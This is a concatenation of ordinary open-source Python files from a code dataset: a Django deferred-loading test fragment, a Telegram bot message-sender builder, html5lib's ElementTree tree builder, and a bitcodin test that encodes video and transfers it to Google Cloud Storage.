obj = BigChild.objects.only("other").get(name="b4")
self.assert_delayed(obj, 4)
self.assertEqual(obj.name, "b4")
self.assertEqual(obj.value, "foo")
self.assertEqual(obj.other, "bar")
obj.name = "bb"
obj.save()
def test_defer_proxy(self):
"""
Ensure select_related together with only on a proxy model behaves
as expected. See #17876.
"""
related = Secondary.objects.create(first='x1', second='x2')
ChildProxy.objects.create(name='p1', value='xx', related=related)
children = ChildProxy.objects.all().select_related().only('id', 'name')
self.assertEqual(len(children), 1)
child = children[0]
self.assert_delayed(child, 1)
self.assertEqual(child.name, 'p1')
self.assertEqual(child.value, 'xx')
| mit |
alvarogzp/telegram-bot | bot/logger/message_sender/factory.py | 1 | 3670 | from bot.api.api import Api
from bot.logger.message_sender.asynchronous import AsynchronousMessageSender
from bot.logger.message_sender.message_builder.factory import MessageBuilderFactory
from bot.logger.message_sender.reusable.limiter.group import ReusableMessageLimiterGroup
from bot.logger.message_sender.reusable.limiter.length import LengthReusableMessageLimiter
from bot.logger.message_sender.reusable.limiter.number import NumberReusableMessageLimiter
from bot.logger.message_sender.reusable.limiter.timed import TimedReusableMessageLimiter
from bot.logger.message_sender.reusable.reusable import ReusableMessageSender
from bot.logger.message_sender.reusable.same import SameMessageSender
from bot.logger.message_sender.synchronized import SynchronizedMessageSender
from bot.multithreading.worker import Worker
class MessageSenderFactory:
@classmethod
def get_builder(cls):
return cls.get_synchronized_length_time_and_number_limited_reusable_builder()
@staticmethod
def get_synchronized_length_time_and_number_limited_reusable_builder():
return SynchronizedLengthTimeAndNumberLimitedReusableMessageSenderBuilder()
class SynchronizedLengthTimeAndNumberLimitedReusableMessageSenderBuilder:
def __init__(self):
self.api = None
self.chat_id = None
self.message_builder_type = None
self.reuse_max_length = None
self.reuse_max_time = None
self.reuse_max_number = None
self.worker = None
def with_api(self, api: Api):
self.api = api
return self
def with_chat_id(self, chat_id):
self.chat_id = chat_id
return self
def with_message_builder_type(self, message_builder_type: str):
self.message_builder_type = message_builder_type
return self
def with_reuse_max_length(self, reuse_max_length: int):
self.reuse_max_length = reuse_max_length
return self
def with_reuse_max_time(self, reuse_max_time: int):
self.reuse_max_time = reuse_max_time
return self
def with_reuse_max_number(self, reuse_max_number: int):
self.reuse_max_number = reuse_max_number
return self
def with_worker(self, worker: Worker):
self.worker = worker
return self
def build(self):
self.__check_not_none(self.api, self.chat_id, self.message_builder_type, self.reuse_max_length,
self.reuse_max_time, self.reuse_max_number)
sender = \
SynchronizedMessageSender(
ReusableMessageSender(
SameMessageSender(self.api, self.chat_id),
MessageBuilderFactory.get(self.message_builder_type),
ReusableMessageLimiterGroup(
LengthReusableMessageLimiter(self.reuse_max_length),
TimedReusableMessageLimiter(self.reuse_max_time),
NumberReusableMessageLimiter(self.reuse_max_number)
)
)
)
if self.worker:
sender = AsynchronousMessageSender(sender, self.worker)
return sender
@staticmethod
def __check_not_none(*args):
for arg in args:
assert arg is not None
def copy(self):
return self.__class__()\
.with_api(self.api)\
.with_chat_id(self.chat_id)\
.with_message_builder_type(self.message_builder_type)\
.with_reuse_max_length(self.reuse_max_length)\
.with_reuse_max_time(self.reuse_max_time)\
.with_reuse_max_number(self.reuse_max_number)\
.with_worker(self.worker)
| agpl-3.0 |
miconof/headphones | lib/html5lib/treebuilders/etree.py | 721 | 12609 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
import re
from . import _base
from .. import ihatexml
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation, fullTree=False):
ElementTree = ElementTreeImplementation
ElementTreeCommentType = ElementTree.Comment("asd").tag
class Element(_base.Node):
def __init__(self, name, namespace=None):
self._name = name
self._namespace = namespace
self._element = ElementTree.Element(self._getETreeTag(name,
namespace))
if namespace is None:
self.nameTuple = namespaces["html"], self._name
else:
self.nameTuple = self._namespace, self._name
self.parent = None
self._childNodes = []
self._flags = []
def _getETreeTag(self, name, namespace):
if namespace is None:
etree_tag = name
else:
etree_tag = "{%s}%s" % (namespace, name)
return etree_tag
def _setName(self, name):
self._name = name
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getName(self):
return self._name
name = property(_getName, _setName)
def _setNamespace(self, namespace):
self._namespace = namespace
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getNamespace(self):
return self._namespace
namespace = property(_getNamespace, _setNamespace)
def _getAttributes(self):
return self._element.attrib
def _setAttributes(self, attributes):
# Delete existing attributes first
# XXX - there may be a better way to do this...
for key in list(self._element.attrib.keys()):
del self._element.attrib[key]
for key, value in attributes.items():
if isinstance(key, tuple):
name = "{%s}%s" % (key[2], key[1])
else:
name = key
self._element.set(name, value)
attributes = property(_getAttributes, _setAttributes)
def _getChildNodes(self):
return self._childNodes
def _setChildNodes(self, value):
del self._element[:]
self._childNodes = []
for element in value:
self.insertChild(element)
childNodes = property(_getChildNodes, _setChildNodes)
def hasContent(self):
"""Return true if the node has children or text"""
return bool(self._element.text or len(self._element))
def appendChild(self, node):
self._childNodes.append(node)
self._element.append(node._element)
node.parent = self
def insertBefore(self, node, refNode):
index = list(self._element).index(refNode._element)
self._element.insert(index, node._element)
node.parent = self
def removeChild(self, node):
self._element.remove(node._element)
node.parent = None
def insertText(self, data, insertBefore=None):
if not(len(self._element)):
if not self._element.text:
self._element.text = ""
self._element.text += data
elif insertBefore is None:
# Insert the text as the tail of the last child element
if not self._element[-1].tail:
self._element[-1].tail = ""
self._element[-1].tail += data
else:
# Insert the text before the specified node
children = list(self._element)
index = children.index(insertBefore._element)
if index > 0:
if not self._element[index - 1].tail:
self._element[index - 1].tail = ""
self._element[index - 1].tail += data
else:
if not self._element.text:
self._element.text = ""
self._element.text += data
def cloneNode(self):
element = type(self)(self.name, self.namespace)
for name, value in self.attributes.items():
element.attributes[name] = value
return element
def reparentChildren(self, newParent):
if newParent.childNodes:
newParent.childNodes[-1]._element.tail += self._element.text
else:
if not newParent._element.text:
newParent._element.text = ""
if self._element.text is not None:
newParent._element.text += self._element.text
self._element.text = ""
_base.Node.reparentChildren(self, newParent)
class Comment(Element):
def __init__(self, data):
# Use the superclass constructor to set all properties on the
# wrapper element
self._element = ElementTree.Comment(data)
self.parent = None
self._childNodes = []
self._flags = []
def _getData(self):
return self._element.text
def _setData(self, value):
self._element.text = value
data = property(_getData, _setData)
class DocumentType(Element):
def __init__(self, name, publicId, systemId):
Element.__init__(self, "<!DOCTYPE>")
self._element.text = name
self.publicId = publicId
self.systemId = systemId
def _getPublicId(self):
return self._element.get("publicId", "")
def _setPublicId(self, value):
if value is not None:
self._element.set("publicId", value)
publicId = property(_getPublicId, _setPublicId)
def _getSystemId(self):
return self._element.get("systemId", "")
def _setSystemId(self, value):
if value is not None:
self._element.set("systemId", value)
systemId = property(_getSystemId, _setSystemId)
class Document(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_ROOT")
class DocumentFragment(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_FRAGMENT")
def testSerializer(element):
rv = []
def serializeElement(element, indent=0):
if not(hasattr(element, "tag")):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
rv.append("#document")
if element.text is not None:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
elif element.tag == ElementTreeCommentType:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.text))
else:
assert isinstance(element.tag, text_type), \
"Expected unicode, got %s, %s" % (type(element.tag), element.tag)
nsmatch = tag_regexp.match(element.tag)
if nsmatch is None:
name = element.tag
else:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
name = "%s %s" % (prefix, name)
rv.append("|%s<%s>" % (' ' * indent, name))
if hasattr(element, "attrib"):
attributes = []
for name, value in element.attrib.items():
nsmatch = tag_regexp.match(name)
if nsmatch is not None:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
attr_string = "%s %s" % (prefix, name)
else:
attr_string = name
attributes.append((attr_string, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
if element.text:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
indent += 2
for child in element:
serializeElement(child, indent)
if element.tail:
rv.append("|%s\"%s\"" % (' ' * (indent - 2), element.tail))
serializeElement(element, 0)
return "\n".join(rv)
def tostring(element):
"""Serialize an element and its child nodes to a string"""
rv = []
filter = ihatexml.InfosetFilter()
def serializeElement(element):
if isinstance(element, ElementTree.ElementTree):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s PUBLIC "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
if element.text is not None:
rv.append(element.text)
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
for child in element:
serializeElement(child)
elif element.tag == ElementTreeCommentType:
rv.append("<!--%s-->" % (element.text,))
else:
# This is assumed to be an ordinary element
if not element.attrib:
rv.append("<%s>" % (filter.fromXmlName(element.tag),))
else:
attr = " ".join(["%s=\"%s\"" % (
filter.fromXmlName(name), value)
for name, value in element.attrib.items()])
rv.append("<%s %s>" % (element.tag, attr))
if element.text:
rv.append(element.text)
for child in element:
serializeElement(child)
rv.append("</%s>" % (element.tag,))
if element.tail:
rv.append(element.tail)
serializeElement(element)
return "".join(rv)
class TreeBuilder(_base.TreeBuilder):
documentClass = Document
doctypeClass = DocumentType
elementClass = Element
commentClass = Comment
fragmentClass = DocumentFragment
implementation = ElementTreeImplementation
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
if fullTree:
return self.document._element
else:
if self.defaultNamespace is not None:
return self.document._element.find(
"{%s}html" % self.defaultNamespace)
else:
return self.document._element.find("html")
def getFragment(self):
return _base.TreeBuilder.getFragment(self)._element
return locals()
getETreeModule = moduleFactoryFactory(getETreeBuilder)
| gpl-3.0 |
bitmovin/bitcodin-python | bitcodin/test/job/testcase_autotransfer_job_gcs.py | 1 | 2586 | __author__ = 'Dominic Miglar <dominic.miglar@bitmovin.net>'
import unittest
from time import sleep, time
from bitcodin import create_job
from bitcodin import create_input
from bitcodin import create_encoding_profile
from bitcodin import delete_input
from bitcodin import delete_encoding_profile
from bitcodin import transfer_job
from bitcodin import create_output
from bitcodin import delete_output
from bitcodin import get_job_status
from bitcodin import Job
from bitcodin import Input
from bitcodin import AudioStreamConfig
from bitcodin import VideoStreamConfig
from bitcodin import EncodingProfile
from bitcodin import GCSOutput
from bitcodin.exceptions import BitcodinError
from bitcodin.test.settings import gcs_output_config
from bitcodin.test.config import test_video_url
from bitcodin.test.bitcodin_test_case import BitcodinTestCase
class AutoTransferJobToGCSTestCase(BitcodinTestCase):
def setUp(self):
super(AutoTransferJobToGCSTestCase, self).setUp()
self.maxDiff = None
input_url = test_video_url
input = Input(input_url)
self.input = create_input(input)
audio_stream_config = AudioStreamConfig(default_stream_id=0, bitrate=192000)
video_stream_config = VideoStreamConfig(default_stream_id=0, bitrate=512000,
profile='Main', preset='premium', height=480, width=640)
encoding_profile = EncodingProfile('API Test Profile', [video_stream_config], [audio_stream_config])
self.encoding_profile = create_encoding_profile(encoding_profile)
self.manifests = ['m3u8', 'mpd']
output = GCSOutput(
name='Python Test Output',
access_key=gcs_output_config.get('accessKey'),
secret_key=gcs_output_config.get('secretKey'),
bucket=gcs_output_config.get('bucket'),
prefix=gcs_output_config.get('prefix'),
make_public=False
)
self.output = create_output(output)
def runTest(self):
job = Job(
input_id=self.input.input_id,
encoding_profile_id=self.encoding_profile.encoding_profile_id,
manifest_types=self.manifests,
output_id=self.output.output_id
)
self.job = create_job(job)
self.wait_until_job_finished(self.job.job_id)
def tearDown(self):
delete_input(self.input.input_id)
delete_encoding_profile(self.encoding_profile.encoding_profile_id)
super(AutoTransferJobToGCSTestCase, self).tearDown()
if __name__ == '__main__':
unittest.main()
| unlicense |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.